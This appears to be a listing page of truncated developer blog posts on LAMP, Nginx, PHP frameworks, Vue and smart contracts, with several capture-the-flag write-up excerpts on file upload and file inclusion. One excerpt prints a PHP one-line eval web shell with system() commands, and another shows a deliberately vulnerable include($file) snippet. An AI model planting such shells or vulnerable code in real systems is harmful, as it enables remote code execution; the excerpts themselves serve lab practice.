Top level distribution analysis of LAMP architecture in Linux system

Top level distribution analysis of LAMP architecture in Linux system theory 1, LAMP (Linux Apache MySQL PHP) LAMP It has the advantages of universal, cross platform, high performance and low price LAMP Whether it is performance, quality or price, it is the preferred platform for enterprises to build websites (1) Distribution interpretation ...

Posted by m5638829 on Sat, 05 Mar 2022 03:04:30 +0100

PHP builds a high-performance API architecture based on SW-X framework

preface Official website address: SW-X framework - PHP swoolex framework focusing on high-performance and convenient development I hope the big guys raise their hands and give my little brother a star: https://github.com/swoolex/swoolex 1. 404 interface configuration In the HTTP service, when the corresponding route cannot be found, it will ...

Posted by nikes90 on Fri, 04 Mar 2022 08:05:05 +0100

Nginx basic introduction + cross domain solution

Author: Jingteng source: Hang Seng LIGHT cloud community Introduction to Nginx Nginx is a high-performance http server / reverse proxy server and e-mail (IMAP/POP3) proxy server developed by Igor Sysoev, a Russian programmer. Its main functions include: Reverse proxy load balancing HTTP server At present, most of the running Ngi ...

Posted by Bobulous on Wed, 02 Mar 2022 08:37:34 +0100

Vue3! ElementPlus! More elegant use of Icon

preface This may be the most convenient and appropriate way to use Icon at present, especially in Vue3. Do you think it is only applicable to Vue3? No, don't be deceived by the title. It supports many mainstream frameworks such as Vue2/Vue3, React, React, Solid and Svelte. Similarly, it also supports Vite, Roullp, Webpack, Nuxt, V ...

Posted by adaminms on Wed, 02 Mar 2022 05:04:56 +0100

[file upload vulnerability 04] server MIME detection and bypass experiment (based on upload-labs-2 shooting range)

1 MIME overview 1.1 general Definition: MIME (Multipurpose Internet Mail Extensions) is a Multipurpose Internet mail extension type. It is an Intel standard that describes the content type of messages. MIME messages can contain text, images, audio, video and other application specific data.Meaning: the original purpose of MIME design is t ...

Posted by tomdude48 on Tue, 01 Mar 2022 10:52:12 +0100

PHP builds a high-performance API architecture based on SW-X framework

prefaceOfficial website address: SW-X framework - PHP swoolex framework focusing on high-performance and convenient developmentI hope the big guys raise their hands and give my little brother a star: https://github.com/swoolex/swoolex1. What is Restful componentIn SW-X, Restful component is the encapsulation support of API return value structur ...

Posted by Bidibule on Tue, 01 Mar 2022 05:03:59 +0100

web3 - overview of smart contract | PHP implementation of ETH 4

Smart contract overview Smart contract is the software running on the blockchain. It is often compared to "vending machine", because it is easy to understand: the vending machine accepts and executes external instructions. When the customer selects the goods and pays, the vending machine will release the goods to the customer without ...

Posted by HughbertD on Sat, 26 Feb 2022 17:26:06 +0100

[ctfshow] file upload web151-170wp

web151 1. Write a sentence and upload it It is found that the front end has verification <?php @eval($_POST[1]);?> Directly click on F12 2. Modify front-end verification You can upload successfully 3. Find flag on ant sword //Common commands: 1=system("ls /"); //Find root directory 1=system("ls ./"); //Find c ...

Posted by Juan Dela Cruz on Sat, 26 Feb 2022 15:55:08 +0100

The [CTFshow] file contains web78-web81

web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } See the include function in the source code. This means that the php file is imported from the outside and executed. If the execution is unsuccessful, the source code of the file is returned.The get parameter of the file ...

Posted by pineapple1 on Fri, 25 Feb 2022 15:16:21 +0100

PHP: save the uploaded Word file to the MS SQL Server database

It took a whole day to save the uploaded Word file to the MS SQL Server 2014 database. It's the first time to use PHP to develop a small program, which is also very stressful. The main reason is that users think I can finish it soon. It's a little embarrassing. How can it be?! For PHP, I'm still a novice. There's no way but to work hard. It s ...

Posted by timecatcher on Fri, 25 Feb 2022 11:58:48 +0100